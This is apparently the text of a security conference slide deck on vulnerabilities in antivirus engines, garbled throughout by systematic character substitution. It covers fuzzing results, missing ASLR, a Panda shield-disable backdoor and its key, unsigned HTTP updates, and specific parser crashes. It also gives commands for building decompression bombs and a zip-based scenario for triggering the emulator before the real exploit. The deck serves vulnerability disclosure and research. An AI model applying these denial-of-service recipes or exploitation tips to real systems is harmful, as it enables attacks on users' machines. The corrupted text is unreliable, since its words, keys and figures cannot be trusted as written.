Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 201

Breaking antivirus software

Introduction Atta!king antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities Con!$usions (e!o''en#ations

Antivirus products

)*at is an Antivirus+ Extra!te# fro' )iki&e#ia,

An antivirus is a software used to prevent, detect and remove malware such as computer viruses.

A- software !an %e fo!use# in offering en#. &oint &rote!tion /)orkstation &ro#u!ts0 or fi$e. server &rote!tion /Server &ro#u!ts su!* as 'ai$ fi$ters, S1B s!anners, et!22202 Overa$$, t*e genera$ ai' of an Antivirus is to offer a %etter $eve$ of &rote!tion t*an w*at t*e un#er$3ing o&erating s3ste' offers a$one2

And they often fail miserably...

Antivirus Engines

Co''on features of A- engines,

)ritten in C4C552
Signatures %ase# engine 5 *euristi!s2 On.a!!ess s!anners2 Co''an# $ine467I on.#e'an# s!anners2 Su&&ort for !o'&resse# fi$e ar!*ives2 Su&&ort for &a!kers2 Su&&ort for 'is!e$$aneous fi$e for'ats2 8a!ket fi$ters an# firewa$$s2 9rivers to &rote!t t*e &ro#u!t, anti.rootkits, et!222 Anti.ex&$oiting too$kits2

A#van!e# !o''on features,

Antivirus products, engines and bugs

An antivirus engine is :ust t*e !ore, t*e kerne$, of an antivirus &ro#u!t2 So'e antivirus engines are use# %3 'u$ti&$e &ro#u!ts2

"or exa'&$e, Bit9efen#er is t*e 'ost wi#e$3 use# antivirus kerne$2 It;s use# %3 'an3 &ro#u!ts $ike 6.9ata, <i=oo >?0, eS!an, ".Se!ure, et!222 1ost @%igA antivirus !o'&anies *ave t*eir own engine %ut not a$$2 An# so'e !o'&anies, $ike ".Se!ure, integrate >r# &art3 engines in t*eir &ro#u!ts2

In genera$, #uring t*is ta$k I wi$$ refer to A- engines, to t*e kerne$s, ex!e&t w*en s&e!ifie# t*e wor# @&ro#u!tA2 A$so, un$ess s&e!ifie# as fixe#, a$$ %ugs s*own #uring t*is &resentation are 0#a3s2

Antivirus users

)*at t*e average user of an antivirus t*inks after insta$$ing *is4*er &referre# A- engine,

I'm safe because I use an antivirus product.

)*at so'e &aranoi# users of antivirus &ro#u!ts t*inks,

I'm safe because I use various antivirus products. An3 software 3ou insta$$ 'akes 3ou a %it 'ore vu$nera%$e2 A- engines are no ex!e&tions2 Just t*e o&&osite2 222

13 o&inion,

Attack surface

"a!t, insta$$ing an a&&$i!ation in 3our !o'&uter 'akes 3ou a %it 'ore vu$nera%$e2

You :ust in!rease# 3our atta!k surfa!e2

If t*e a&&$i!ation is $o!a$, 3our $o!a$ atta!k surfa!e in!rease#2 If t*e a&&$i!ation is re'ote, 3our re'ote atta!k surfa!e in!rease#2 If 3our a&&$i!ation runs wit* t*e *ig*est &rivi$eges, insta$$s kerne$ #rivers, a &a!ket fi$ter an# tries to *an#$e an3t*ing 3our !o'&uter 'a3 #o222

Your atta!k surfa!e #ra'ati!a$$3 in!rease#2

Myths and reality

Antivirus &ro&agan#a,

@)e 'ake 3our !o'&uter safer wit* no &erfor'an!e &ena$t3BA @)e &rote!t against unknown Cero #a3 atta!ksBA2 A- engines 'akes 3our !o'&uter 'ore vu$nera%$e wit* a var3ing #egree of &erfor'an!e &ena$t32 D*e A- engine is as vu$nera%$e to Cero #a3 atta!ks as t*e a&&$i!ations it tries to &rote!t fro'2

(ea$it3,

An# !an even $ower t*e o&erating s3ste' ex&$oiting 'itigations, %3 t*e wa3222

Breaking antivirus software

Intro#u!tion Attacking antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities Con!$usions (e!o''en#ations

Attacking antivirus engines

A- engines, !o''on$3, are written in non 'anage# $anguages #ue to &erfor'an!e reasons2

A$'ost a$$ engines written in C an#4or C55 wit* on$3 a few ex!e&tions, $ike t*e o$# 1a$wareB3tes, written in -B? /B+02 It trans$ates into %uffer overf$ows, integer overf$ows, for'at strings, et!222

1ost A- engines insta$$s o&erating s3ste' #rivers2

It trans$ates into &ossi%$e $o!a$ es!a$ation of &rivi$eges2

(ar, Ei&, FC, Gar, Dar, C&io, O$e2, 8#f, C*', =$&, 8E, E$f, 1a!*.O, J&g, 8ng, BC, 6C, HC'a, Dga, )'f, I!o, Cur222 It trans$ates into %ugs in t*e &arsers of su!* fi$e for'ats2

A- engines 'ust su&&ort a $ong $ist of fi$e for'ats,

Attacking antivirus engines

A- engines nee# to su&&ort su!* $arge $ist of fi$e for'ats Iui!k$3 an# even %etter t*an t*e ven#or2
If an ex&$oit for a new fi$e for'at a&&ears, !usto'er wi$$ ask for su&&ort for su!* fi$es as soon as &ossi%$e2 D*e $onger it takes, t*e *ig*er t*e o##s of $osing a !usto'er 'oving on to anot*er ven#or2 D*e &ro#u!er #oesn;t nee# to @su&&ortA 'a$for'e# fi$es2 D*e A- engine a!tua$$3 nee#s to #o so2

D*e ven#or nee#s to *an#$e 'a$for'e# fi$es %ut on$3 to refuse t*e' as re&airing su!* fi$es is an o&en #oor for vu$nera%i$ities2

Exa'&$e, A#o%e A!ro%at

Attacking antivirus engines

1ost /if not a$$2220 antivirus engines run wit* t*e *ig*est &rivi$eges, root or $o!a$ s3ste'2

If one !an fin# a %ug an# write an ex&$oit for t*e A- engine, /s0*e :ust won root or s3ste' &rivi$eges2 San#%oxes, virtua$ 'a!*ines, et!222 are extre'e$3 rare2 If one !an 1ID1 t*e !onne!tion /for exa'&$e, in a HAN0 one !an insta$$ new fi$es an#4or re&$a!e existing insta$$ation fi$es2 It often trans$ates in !o'&$ete$3 owning t*e 'a!*ine wit* t*e A- engine insta$$e# as u&#ates are not !o''on$3 signe#2 Yes2 D*e3 aren;t2

1ost antivirus engines u&#ates via =DD8 on$3 &roto!o$s,

I wi$$ s*ow $ater one of t*e 'an3 vu$nera%$e &ro#u!ts222

Attacking antivirus engines

A- engines often offer on.a!!ess s!anners an# %e*aviour %ase# *euristi! engines2 Su!* s!anners are usua$$3 i'&$e'ente# in > #ifferent wa3s,

A san#%ox on to& of t*e A-;s Inte$ xJ? e'u$ator2 -er3 s$ow %ut, a$so, ver3 $itt$e o##s to atta!k su!* !o'&onent2 A #river to 'onitor fi$e !reation4a!!ess as we$$ as &ro!ess %e*aviour !o''uni!ating wit* a user.$eve$ !o'&onent2 D*ere is s&a!e for a &ossi%$e Eo82 In:e!ting $i%raries in a$$ user.&ro!esses an# *ooking s&e!ia$ fun!tions2 D*e easiest wa3 to i'&$e'ent *euristi! engines2

Often, su!* @&rote!tionA 'et*o#s 'ake t*ings worst t*an not *aving an antivirus engine2

I;$$ s*ow $ater on w*3 wit* so'e rea$ vu$nera%i$ities222

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines Finding vulnerabilities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities Con!$usions (e!o''en#ations

Vulnerabilities in AV engines

Starte# aroun# en# of Ju$34%eginning of August to fin# vu$nera%i$ities, for fun, in A- engines2

In '3 s&are ti'e, so'e *ours fro' ti'e to ti'e2

"oun# re'ote an# $o!a$ vu$nera%i$ities in 1 Aengines or A- &ro#u!ts2

1ost of t*e' in t*e first 2 'ont*s2 I teste# K1F engines /I t*ink, I *onest$3 #o not re'e'%er02 It sa3s it a$$2

I;$$ ta$k a%out so'e of t*e vu$nera%i$ities I foun#2 D*e fo$$owing are :ust a !ou&$e of t*e'222

AV engines vulnerabilities

Avast, =ea& overf$ow in (81 /re&orte#, fixe# an# Bug Bount3 &ai#0 Avg, =ea& overf$ow wit* C&io /fixe#222041u$ti&$e vu$nera%i$ities wit* &a!kers Avira, 1u$ti&$e re'ote vu$nera%i$ities Bit9efen#er, 1u$ti&$e re'ote vu$nera%i$ities C$a'A-,Infinite $oo& wit* a 'a$for'e# 8E /re&orte# L fixe#, &at!* avai$a%$e soon0 Co'o#o, =ea& overf$ow wit* C*' 9r)e%, 1u$ti&$e re'ote vu$nera%i$ities ESED, Integer overf$ow wit* 89"41u$ti&$e vu$nera%i$ities wit* &a!kers ".8rot, =ea& overf$ows wit* 'u$ti&$e &a!kers ".Se!ure, 1u$ti&$e re'ote vu$nera%i$ities /!onta!te#, a'aCing$3 !o$$a%orative0 8an#a, 1u$ti&$e $o!a$ &rivi$ege es!a$ations /re&orte# an# &artia$$3 fixe#0 eS!an, (e'ote !o''an# in:e!tion

An# 'an3 'ore222

Broken AV products...

D*e $ist is inter'ina%$e222 %ut, using t*is $ist *tt&,44www2av.!o'&aratives2org4av.ven#ors4

222an3t*ing using a >r# &art3 engine w*i!* is not -i&re, Nor'an, C3ren or Agnitu'2

Exa'&$es, <i=oo >?0, ".Se!ure, 6.9ata, eS!an, E'sisoft, Bu$$6uar#, I''unet, et!222

5 a$$ t*e A- &ro#u!ts using t*e A- engines 'entione# in t*e &revious s$i#e2 5 so'e rare A- &ro#u!ts $ike BkA-2

ow to find such vulnerabilities!

I use# initia$$3 a fuCCing testing suite of '3 own, Nig*t'are2

*tt&,44www2:oxeankoret2!o'4#own$oa#4Nig*t'are.020222tar2gC I wi$$ eventua$$3 u&$oa# t*e !o#e to 6it=u%2!o'

9own$oa#e# a$$ t*e A- engines wit* a Hinux version I was a%$e to fin#2

D*e !ore is a$wa3s t*e sa'e wit* t*e on$3 ex!e&tion of so'e *euristi! engines2 A$so use# so'e /#irt30 tri!ks to run )in#ows on$3 A- engines in Hinux2

"uCCe# t*e !o''an# $ine too$ of ea!* A- engine %3 si'&$3 using ra#a'sa 5 t*e testing suite of C$a'A-, 'an3 #ifferent EGE &a!kers an# so'e ran#o' fi$e for'ats2 (esu$ts, 9oCens of re'ote$3 ex&$oita%$e vu$nera%i$ities2 A$so, I &erfor'e# %asi! $o!a$ an# re'ote !*e!ks,

ASH(, nu$$ ACHs, u&#ating &roto!o$, network servi!es, et!222

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines "in#ing vu$nera%i$ities

Initial e"peri#ents

Ex&$oiting antivirus engines Antivirus vu$nera%i$ities Con!$usions (e!o''en#ations

Fu$$ing statistics

A frien# of 'ine !onvin!e# 'e to write a fuCCer an# #o a @"uCCing ex&$aine#A $ike ta$k for a &rivate !onferen!e2

(ea$$3 si'&$e fuCCing engine wit* a 'ax2 of 10 no#es2

I;' &oor222 I !annot @start relatively small, with 300 boxes $ike 6oog$e &eo&$e #oes.

7se# t*is fuCCing suite to fuCC various Hinux %ase# Aengines, t*ose I was a%$e to run an# #e%ug2 "or t*at ta$k I #i# fuCC4test t*e fo$$owing ones,

Bit9efen#er, Co'o#o, ".8rot, ".Se!ure, Avast, C$a'A-, A-62

(esu$ts222

%la#AV

On$3 1 non re&ro#u!i%$e !ras* ,/

(an for a%out 2 weeks2

1 infinite $oo& wit* a 'a$for'e# 8E2 Aske# to re'ain si$ent unti$ a &u%$i! &at!* is &u%$is*e#2

On$3 1 9OS /foun# 'anua$$30

=onest$3, I was ver3 sur&rise#2 It see's t*e3 use fuCCing2

)e$$ #one gu3sB

F&'ecure

No !ras* at a$$2 On$3 foun# 1 'e'or3 ex*austion %ug wit* C8IO2

Consu'es u& to 6B of 'e'or32

I was sure I was #oing so'et*ing wrong an# I verifie# it $ater on222 9e!i#e# not to !ontinue at t*at 'o'ent %e!ause it was too *eav3 an# reIuire# root for #e%ug2

Avast

M #ifferent %ugs2

So'e of t*e' #isa&&eare# Iui!k$3222

1 of t*e' see'e# to %e ex&$oita%$e2

(81 Su&&ort2 Bug re&orte# an# fixe#2

D*is is one of t*e A- engines I fuCCe# t*e 'ost, K1 'ont*2 D*e3 *ave a Bug Bount3B

On$3 reason w*3 I !onta!te# t*e'2

%o#odo AV

On$3 M !ras*es2 2 #ifferent %ugs2 1 see's to %e ex&$oita%$e2

=ea& overf$ow wit* C=1 fi$es w*en un!o'&ressing #ata222

I1=O, it #i#n;t fai$ 'ore %e!ause t*e3 #on;t su&&ort an3t*ing222

F&(rot

#ifferent %ugs2 On$3 $eft for aroun# 24> *ours2 D*e %ugs see's to %e a$$ ex&$oita%$es2

Ar'a#i$$o, 8ECo'&a!t, AS8a!k an# Yo#a;s 8rote!tor un&a!kers2 Cras*es at 'e'!&3 !o'ing fro' #ifferent &at*s222

AV)

=un#re# of !ras*es, fuCCe# @'anua$$3A ,/

It sen#s !ras* re&orts auto'ati!a$$3 ,4 I *ate 3ou2 It nee#s to %e fe# via SD9IN2 Anno3ing2

#ifferent %ugs foun#2 2 of t*e' see' to %e ex&$oita%$e2

C8IO an# GA( fi$es su&&ort2 1st one fixe# re!ent$3 ,4 GA( one sti$$ 0#a32

Bit*efender

+,-.. !ras*es2 F #ifferent %ugs2

1ost of t*e' wit* EGE un&a!kers an# EGE un!o'&ressors2 D*insta$$ an# S*rinker, for exa'&$e2

2 of t*e' see's to %e ex&$oita%$e2

More about fu$$ing AV engines

1ost A- engines are )in#ows on$32 =owever, we !an sti$$ fuCC t*e' in non )in#ows %ase# environ'ents /Hinux reIuires $ess 'e'or3 an# #isk02 )*at I *ave #one,

Dr3 to run it wit* )ine2 If it works use )ine9B6 5 69B server an# !onne!t I9A or 69B to t*e target2 If it #oesn;t work, reverse engineer t*e !ore engine an# write a 'ore si'&$e wra&&er for it2

-er3 ti'e !onsu'ing %ut t*e %est o&tion2

222

More about fu$$ing AV engines

A- engines take a $ong w*i$e $oa#ing t*e !ore2 D*e3 nee# to $oa# a$$ t*e signatures, un&a!k4#e!r3&t t*e' in 'e'or3, et!222 D*e so$ution, use in.'e'or3 fuCCing2

(everse engineer 3our favourite A-;s !ore engine an# fin# t*e fun!tions w*ere fi$es are %eing s!anne#2 9e%ug t*e target a&&$i!ation wit* I9A an# use t*e A&&Ca$$ feature to !a$$ t*ose fun!tions wit* 3our own in&ut2 "or exa'&$e2 You #on;t nee# to restart it again an# again2 Just wait for it to !ras* w*i$e !ontinuous$3 fee#ing fuCCe# in&uts2

=owever, it 'a3 !ause so'e fa$se &ositives,

So'e fi$es4%uffers !an %e #is!ar#e# at so'e &oint %efore t*at s!anning routine2

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

E"ploiting antivirus engines Antivirus vu$nera%i$ities Con!$usions (e!o''en#ations

E"ploiting AV engines

)*at wi$$ %e %rief$3 !overe#,

(e'ote ex&$oitation2 Ho!a$ ex&$oitation of $o!a$ user.$an# or kerne$.$an# vu$nera%i$ities2 I *ave no know$e#ge a%out kerne$.$an#, sorr32 Hater on, I wi$$ #is!uss so'e $o!a$ vu$nera%i$it3 an# give #etai$s a%out *ow to ex&$oit it %ut it isn;t kerne$ stuff an# is too eas3 to ex&$oit2

)*at wi$$ %e not,

E"ploiting AV engines

Ex&$oiting an A- engine is $ike ex&$oiting an3 ot*er !$ient.si#e a&&$i!ation2

Is not $ike ex&$oiting a %rowser or a 89" rea#er2 Is 'ore $ike ex&$oiting an Offi!e fi$e for'at2

Ex&$oiting 'e'or3 !orru&tions in !$ient.si#e a&&$i!ations re'ote$3 !an %e Iuite *ar# nowa#a3s #ue to ASH(2

=owever, A- engines 'akes too 'an3 'istakes too often so, #on;t worr3 N0 222

E"ploiting AV engines

In genera$, A- engines are a$$ !o'&i$e# wit* ASH( ena%$e#2 But it;s !o''on t*at on$3 t*e !ore 'o#u$es are !o'&i$e# wit* ASH(2

Not t*e 67I re$ate# &rogra's an# $i%raries, for exa'&$e2

So'e $i%raries of t*e !ore of some A- engines are not ASH( ena%$e#2

C*e!k 3our target4own &ro#u!t, t*ere isn;t on$3 one N0

E"ploiting AV engines

Even in @'a:orA A- engines222

222t*ere are non ASH( ena%$e# 'o#u$es2 222t*ere are ()G &ages at fixe# a##resses2 222t*e3 #isa%$e 9E82

7n#er !ertain !on#itions, of !ourse2 D*e !on#ition, often, is t*e e'u$ator2

E"ploiting AV engines

D*e xJ? e'u$ator is a ke3 &art of an A- engine2 It;s use# to un&a!k sa'&$es in 'e'or3, to #eter'ine t*e %e*aviour of an exe!uta%$e &rogra', et!222 -arious A- engines !reate ()G &ages at fixe# a##resses an# #isa%$e 9E8 as $ong as t*e e'u$ator is use#2

-er3 !o''on2 9oes not a&&$3 to on$3 so'e ran#o' A- engine2

222

E"ploiting AV engines /#ore tips0

B3 #efau$t, an A- engine wi$$ tr3 to un&a!k !o'&resse# fi$es an# s!an t*e fi$es insi#e2 A !o'&resse# ar!*ive fi$e /Ci&, tgC, rar, a!e, et!2220 !an %e !reate# wit* severa$ fi$es insi#e2 D*e fo$$owing is a !o''on A- engines ex&$oitation s!enario,

Sen# a !o'&resse# Ci& fi$e2 D*e ver3 first fi$e insi#e for!es t*e e'u$ator to %e $oa#e# an# use#2 D*e 2n# one is t*e rea$ ex&$oit2

E"ploiting AV engines

A- engines i'&$e'ent 'u$ti&$e e'u$ators2 D*ere are e'u$ators for xJ?, A19? , A(1, JavaS!ri&t, -BS!ri&t, O2 in 'ost of t*e @'a:orA A- engines2 D*e e'u$ators, as far as I !an te$$, !annot %e use# to &erfor' *ea& s&ra3ing, for exa'&$e2 But t*e3 ex&ose a !onsi#era%$e atta!k surfa!e2

It;s !o''on to fin# 'e'or3 $eaks insi#e t*e e'u$ators, s&e!ia$$3 in t*e JavaS!ri&t engine2 D*e3 !an %e use# to !onstru!t !o'&$ex ex&$oits as we *ave a &rogra''ing interfa!e to !raft in&uts to t*e A- engine2

E"ploiting AV engines1 'u##ary

Ex&$oiting A- engines is not #ifferent to ex&$oiting ot*er !$ient.si#e a&&$i!ations2 D*e3 #on;t *ave4offer an3 s&e!ia$ se$f.&rote!tion2 D*e3 re$3 on t*e o&erating s3ste' features /ASH(49E80 an# not*ing e$se2

An# so'eti'es t*e3 even #isa%$e su!* features2 D*e e'u$ators, xJ?, A19.? , A(1, JavaS!ri&t, 222 usua$$32

D*ere are &rogra''ing interfa!es for ex&$oit writers,

1u$ti&$e fi$es #oing #ifferent a!tions ea!* !an %e sen# in one !o'&resse# fi$e as $ong as t*e or#er insi#e it is ke&t2 Owning t*e A- engine 'eans getting root or s3ste' in a$$ A- engines I teste#2 D*ere is no nee# for a san#%ox es!a&e, in genera$2

Breaking antivirus software

Intro#u!tion Atta!king antivirus engines "in#ing vu$nera%i$ities

Initia$ ex&eri'ents

Ex&$oiting antivirus engines Antivirus vulnerabilities Con!$usions (e!o''en#ations

*etails about so#e vulnerabilities in AV engines and products...

Extra!te# fro' *tt&,44t*eoat'ea$2!o'4!o'i!s4gru'& Co&3rig*t P 1att*ew In'an

*isclai#er

I;' on$3 s*owing a !ou&$e of '3 vu$nera%i$ities2

I *ave t*e %a# *a%it of eating > ti'es a #a3222 Avast2 D*e3 offer a Bug Bount32 )e$$ #one gu3sB C$a'A-2 D*eir antivirus is O&en Sour!e2 8an#a2 I *ave close frien#s t*ere2 Ikarus, ESED an# ".Se!ure2 D*e3 !onta!te# 'e an aske# for *e$& ni!e$32

I !onta!te# M ven#ors for #ifferent reasons,

I #o not @res&onsi%$3A !onta!t 'u$ti.'i$$ion #o$$ar !o'&anies2

I #on;t give '3 resear!* for free2 Au#it 3our &ro#u!ts222

Ho!a$ Es!a$ation of 8rivi$eges

E"a#ple1 (anda Multiple local Eo(s

In t*e &ro#u!t 6$o%a$ 8rote!tion 201> t*ere are various &ro!esses running as SYSDE12 Dwo of t*ose &ro!esses *ave a N7HH &ro!ess ACH,

)e%8rox32EGE an# SrvHoa#2EGE

)e !an use Create(e'oteD*rea# to in:e!t a 9HH, for exa'&$e2 Dwo ver3 eas3 $o!a$ es!a$ation of &rivi$eges2 But t*e &ro!esses are @&rote!te#A %3 t*e s*ie$#2

E"a#ple1 (anda Multiple local Eo(s

Anot*er terri%$e %ug, D*e 8an#a;s insta$$ation #ire!tor3 *ave write &rivi$eges for a$$ users2 =owever, again, t*e #ire!tor3 is @&rote!te#A %3 t*e s*ie$#222 )*at is t*e fu!king s*ie$#+

222

E"a#ple1 (anda Multiple local Eo(s

D*e 8an#a s*ie$# is a #river t*at &rote!ts so'e 8an#a owne# &ro!esses, t*e &rogra' fi$es #ire!tor3, et!222 It rea#s so'e registr3 ke3s to #eter'ine if t*e s*ie$# is ena%$e# or #isa%$e#2

But222 t*e registr3 ke3 is wor$# writea%$e2

A$so, it;s funn3, %ut t*ere is a $i%rar3 /&avs*$#2#$$0 wit* various ex&orte# fun!tions222

222

E"a#ple1 (anda Multiple local Eo(s

A$$ ex&orte# fun!tions !ontains *u'an rea#a%$e na'es2 A$$ %ut t*e 2 first fun!tions2 D*e3 are !a$$e# 8A-S=H9Q001 an# 0022 9e!i#e# to reverse engineer t*e' for o%vious reasons222 D*e 1st fun!tion is a %a!k#oor to #isa%$e t*e s*ie$#2 It re!eives on$3 1 argu'ent, a @se!ret ke3A /67I90,

ae21FM>J.1R a. 1FJ.RaJf.2?0?%R #Rf1>

If t*e ke3 is !orre!t, t*en t*e !orres&on#ing registr3 ke3s are written2

)e$$, is easier t*an writing 3ourse$f t*e registr3 entries222

M2A3 (A4*A5

D*ere are 'ore stu&i# %ugs in t*is A- engine222 "or exa'&$e, no $i%rar3 is !o'&i$e# wit* ASH( ena%$e#2 One !an write a re$ia%$e ex&$oit for 8an#a wit*out an3 rea$ %ig effort2 An#, a$so, one !an write an ex&$oit targeting 8an#a 6$o%a$ 8rote!tion users for an3 &rogra'2 )*3+ Be!ause t*e &ro#u!t in:e!ts 6 $i%raries wit*out ASH( ena%$e# in a$$ &ro!esses2 Yes2

(anda

I re&orte# t*e vu$nera%i$ities %e!ause I *ave frien#s t*ere2 So'e of t*e' are /su&&ose#$30 fixe#, ot*ers not222

D*e s*ie$# %a!k#oor2 D*e &er'issions of t*e 8an#a insta$$ation #ire!tor32

D*e in:e!tion of non ran#o'iCe# $i%raries %ug t*at a$$ows writing targete# ex&$oits re'ains222 A$so, #uring '3 $atest testing of t*eir ver3 $ast version, ot*er $o!a$ vu$nera%i$ities a&&eare#222

ASH( re$ate# /A##ress S&a!e Ha3out (an#o'iCation0

A'73 disabled

)e a$rea#3 #is!usse# t*at 8an#a 6$o%a$ 8rote!tion #oesn;t ena%$e ASH( for a$$ 'o#u$es2 9o 3ou %e$ieve t*is is an iso$ate# &ro%$e' of :ust one antivirus &ro#u!t+ As it is !o''on wit* antivirus &ro#u!ts4engines, su!* &ro%$e's are not s&e!ifi!222

2ne e"a#ple...

Forticlient

D*e &ro!ess avQtask2exe is t*e a!tua$ As!anner222

Forticlient

1ost $i%raries an# %inaries in "orti!$ient #oesn;t *ave ASH( ena%$e#2

Ex&$oiting "orti!$ient wit* so 'an3 non ASH( ena%$e# 'o#u$es on!e a %ug is foun# is trivia$2

You 'a3 t*ink t*at t*is is a &ro%$e' t*at #oesn;t *a&&en to t*e @%igA ones222

D*ink again2

8 rando# AVs nobody uses...

9aspersky

Hi%raries avCkrn$2#$$ an# 'o#u$e v$ns2k#$, a vu$nera%i$it3 s!anner /HOH0, are not ASH( ena%$e#2 One !an write a re$ia%$e ex&$oit for Kas&ersk3 A- wit*out an3 rea$ effort2

Bit*efender

It;s ind of easier to write an ex&$oit for Bit9efen#er222

Security service my ass...

B9AV

BKA- is a -ietna'ese antivirus &ro#u!t2 6artner re!ogniCes it as a @Coo$ ven#or in E'erging 1arketsA2 I re!ogniCe it as a @Coo$ antivirus for writing targete# ex&$oitsA222

B9AV

D*e3 #on;t *ave ASH( ena%$e# for t*eir servi!es222

B9AV

An#, $ike 8an#a, t*e3 in:e!t a non ASH( ena%$e# $i%rar3 s3ste' wi#e, t*e Bkav @firewa$$A engine222

222'isera%$3 fai$ing at se!uring 3our !o'&uter2

AV developers writing security software

(e'ote 9enia$ of Servi!e

E"a#ples1 %la#AV *2'

D*ere is a %ug in C$a'A- s!anning so'e resour!e #ire!tor3 in 8E fi$es2

I *ave %een aske# to wait unti$ t*ere is a &u%$i! &at!*2 It;s fixe# in t*eir &rivate re&ositor3 %ut t*e &at!* is %ig so it nee#s so'e &ro&er testing2 Sorr3, I !annot give a$$ t*e #etai$s 3et ,/

"oun# via #u'% ass fuCCing2 (e&orte#2 Be!ause it;s O&en Sour!e222 *tt&s,44%ugCi$$a2!$a'av2net4s*owQ%ug2!gi+i#S10?M0

D*e vu$nera%i$it3 was ni!e$3 *an#$e# %3 t*e C$a'Atea' /now Cis!o02

*eco#pression bo#bs /#ultiple AVs0

9o 3ou re'e'%er t*e'+ If I re'e'%er !orre!t$3, t*e 1st #is!ussion in BugtraI a%out it was in 20012

A !o'&resse# fi$e wit* 'an3 !o'&resse# fi$es insi#e or wit* rea$$3 %ig fi$es insi#e2 It !an %e !onsi#ere# a re'ote #enia$ of servi!e2

9o 3ou t*ink A- engines are not vu$nera%$e an3 'ore to su!* %ugs wit* 'ore t*an 510 3ears+

In t*is !ase, 3ou;re wrong2 Hook to t*e fo$$owing ta%$e2222

Failing AVs
EI8 ESED Bit9efen#er So&*os Co'o#o A-6 Ikarus Kas&ersk3 G /T0 G G G G G /TT0 6E G /TTT0 BE2 (A( G /TTT0 G G G FE

T So&*os finis*es after K>0 se!on#s2 In a @testingA 'a!*ine wit* 1? $ogi!a$ C87s an# >2 6B of (A12 TT Kas&ersk3 !reates a te'&orar3 fi$e2 A >26B #u'% fi$e is a K>1B FC !o'&resse# one2 TTT In '3 $atest testing, ESED finis*es after 1 'inute wit* ea!* fi$e in '3 @s'a$$ testing 'a!*ineA2

*eco#pression bo#bs1 ow to

Do !reate a si'&$e #e!o'&ression %o'% in 7nix issue t*e fo$$owing !o''an#s,

U trun!ate .s JMJRR> MR2 #u'% V J6B U FC4gCi&4%Ci&24rar4$!a%4!o'&ress4xxx #u'%

D*at;s a$$2 D*e resu$t fi$e is a$wa3s $ess t*an 10 1B2 I !ou$#n;t %e$ieve t*at sti$$ nowa#a3s antivirus engines fai$e# at t*is trivial @atta!kA w*en I @#is!overe#A t*is222

Bit*efender engine

Bit9efen#er is a (o'anian antivirus engine2 D*eir A- !ore is t*e 'ost wi#e$3 #istri%ute# Aengine in ot*er A- &ro#u!ts2

Do na'e a few, ".Se!ure, 6.9ata, <i=oo >?0, eS!an, HavaSoft, I''unet, 222

It suffers fro' a nu'%er of vu$nera%i$ities $ike a$'ost a$$ ot*er A- engines4&ro#u!ts out t*ere2 "in#ing vu$nera%i$ities in t*is engine is trivia$2

An eas3 exa'&$e222

Bit*efender bugs

1o#if3ing 2 9)O(9s in a 8E fi$e &a!ke# wit* S*rinker> &a!ker wi$$ 'ake it to !ras*,

D*ose %3tes are use# to !a$!u$ate t*e fi$e an# se!tions a$ign'ent of t*e new, in 'e'or3, un&a!ke# 8E fi$e2 )*en set to 0x"""""""" an# 0x""""""", %ot* fi$e an# se!tions a$ign'ent wi$$ %e set to 0222

Bit*efender bugs

222an# t*eir va$ues wi$$ %e use#, $ater on, in so'e arit*'eti! o&erations,

D*ose 2 %ugs are trivia$ to #is!over2

Bit*efender notes

D*is an# a$$ Bit9efen#er;s %ugs #on;t affe!t ex!$usive$3 Bit9efen#er;s &ro#u!ts2 It affe!ts 'an3 A- &ro#u!ts out t*ere as &revious$3 'entione#2 A##ing a new A- engine to 3our &ro#u!t 'a3 soun# @!oo$A %ut 3ou;re 'aking >r# &art3 %ugs 3ours2 An#, %3 t*e wa3, 3ou #i#n;t au#it it %efore a##ing to 3our &ro#u!t222

Ot*erwise, I #ou%t 3ou wou$# *ave a##e# it2

E'E: 4od68

ESED No#>2 is a S$ovak A- engine2 Hike 'ost A- engines it suffers fro' a nu'%er of vu$nera%i$ities t*at !an %e trivia$$3 #is!overe#2 One $itt$e exa'&$e, a 'a$for'e# 89" fi$e2

A negative or %ig va$ue for an3 e$e'ent of a 4)/i#t*0 e$e'ent wit* arra3s wi$$ 'ake it to !ras*2 A si'&$e re'ote #enia$ of servi!e2

E'E: 4od68 bug with (*F files

A!!or#ing to ESED sour!es t*e3 use fuCCing as &art of <A2

I t*ink t*e3 are not #oing it ver3 we$$222

"in#ing t*is %ug is trivia$, $ike a$$ t*e ones I &revious$3 s*own2

F&'ecure

".Se!ure is an antivirus fro' "inn$an#2 D*e3 use 2 A- engines, t*eir own one an# t*e Bit9efen#er;s one2

So, t*e &revious %ug, t*e Bit9efen#er;s one, a$so affe!ts t*is A- &ro#u!t2

Hike wit* t*e w*o$e 'a:orit3 of A- engines out t*ere, t*ere are rat*er eas3 to #is!over %ugs in t*eir /own0 engine2 Het;s see a si'&$e vu$nera%i$it3 t*e3 fixe# in "e%ruar32

F&'ecure bug with Inno'etup

D*ere was a $itt$e %ug *an#$ing so'e InnoSetu& insta$$ers2 Bug is at Inno9e!o#er,,IsInnoNew/02 A siCe for a !a$$ to "1a$$o! !an %e !ontro$$e#,

F&'ecure bug with Inno'etup

A negative siCe wi$$ 'ake 'a$$o! to fai$ %ut it wi$$ an3wa3 'e'set t*e %uffer222

Basi!a$$3, 'e'set/N7HH, ;W0;, negativeQsiCe02 Anot*er %ug trivia$ to #is!over %3 an3 'eans2

(roof of concepts

8roof of !on!e&ts for t*e $ast #is!usse# %ugs !an %e #own$oa#e# fro' *ere,

*tt&,44www2:oxeankoret2!o'4#own$oa#4>ea0M0?f0eMJ>! *tt&,44xR02es4FH'

S*ortene# 7(H,

(e'ote Co#e Exe!ution

*r;eb antivirus

9r)e% is a (ussian antivirus2 7se#, for exa'&$e, %3 t*e $argest %ank /S%er%ank0 an# t*e $argest sear!* engine in (ussia /Yan#ex0 5 t*e 9u'a, to na'e a few !usto'ers2 1ore of t*eir &ro&agan#a,

*r;eb updating protocol

9r)e% u&#ates via =DD8 on$32 D*e3 #o not use SSH4DHS2 It #own$oa#s a !ata$og fi$e first,

Exa'&$e for Hinux,

*tt&,44XserverY4unix4F004#rwe%>22$st2$C'a

